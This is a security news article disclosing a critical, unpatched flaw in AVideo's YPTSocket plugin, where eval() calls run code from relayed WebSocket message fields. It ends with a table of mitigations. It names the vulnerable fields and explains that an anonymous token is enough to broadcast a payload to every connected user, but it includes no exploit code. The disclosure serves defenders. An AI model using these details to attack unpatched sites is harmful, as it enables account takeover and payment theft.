No Patch Available: The CVSS 10 Flaw Turning AVideo into an Attacker’s Playground
Do Son 
AVideo, a versatile video streaming platform popular among content creators and businesses for hosting and monetizing content, is facing a security crisis. A critical vulnerability has been uncovered in its YPTSocket plugin that essentially allows an unauthenticated attacker to seize control of every active session on the platform simultaneously.
The flaw carries a CVSS score of 10, the highest possible severity rating, indicating that it is easily exploitable and carries devastating consequences for affected instances.
The vulnerability stems from the way the YPTSocket plugin handles WebSocket communications. The server acts as a relay, taking JSON message bodies from one client and broadcasting them to all other connected clients without any sanitization or validation of the content.
The bug lies in the client-side JavaScript (plugin/YPTSocket/script.js), which contains two dangerous eval() sinks. These sinks take fields from the relayed messages—specifically json.msg.autoEvalCodeOnHTML and json.callback—and execute them directly as code in the victim’s browser.
Because AVideo issues authentication tokens to anonymous visitors that are never revalidated beyond their initial decryption, an attacker requires nothing more than a single WebSocket frame to launch a site-wide attack.
When an attacker broadcasts a malicious payload, it executes in the security context (origin) of every currently connected user. This “trust boundary” crossing allows for:
- Universal Account Takeover: Attackers can steal active session data from all users, including administrators.
- Remote Code Execution (RCE): By hijacking an admin session, attackers can perform privileged actions such as installing malicious plugins, which can lead to full server compromise.
- Financial Hijacking: Attackers can rewrite the site’s interface to redirect payments or crypto-donations to their own addresses.
- Persistent Malware: Malicious JavaScript can be stored in localStorage or IndexedDB, ensuring the attack continues even after the user refreshes the page.
As of the latest reports, there are no patched versions available for this vulnerability, which affects all versions 29.0 and below. Administrators are urged to apply manual code fixes to implement the following defense-in-depth layers:
| Defense Layer | Recommended Action |
| Client-Side | Removeeval() sinks entirely from script.js. Replace the callback dispatch logic with a strict, name-based lookup against a predefined allowlist of functions. |
| Server-Side | Whitelist message keys in Message.php to prevent the forwarding of arbitrary JSON fields. Sanitize all callback strings using regular expressions before relaying them. |
| Access Control | Restrict broadcast privileges by requiring authentication for token issuance and ensuring only administrative users can trigger system-wide “msgToAll” broadcasts. |
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
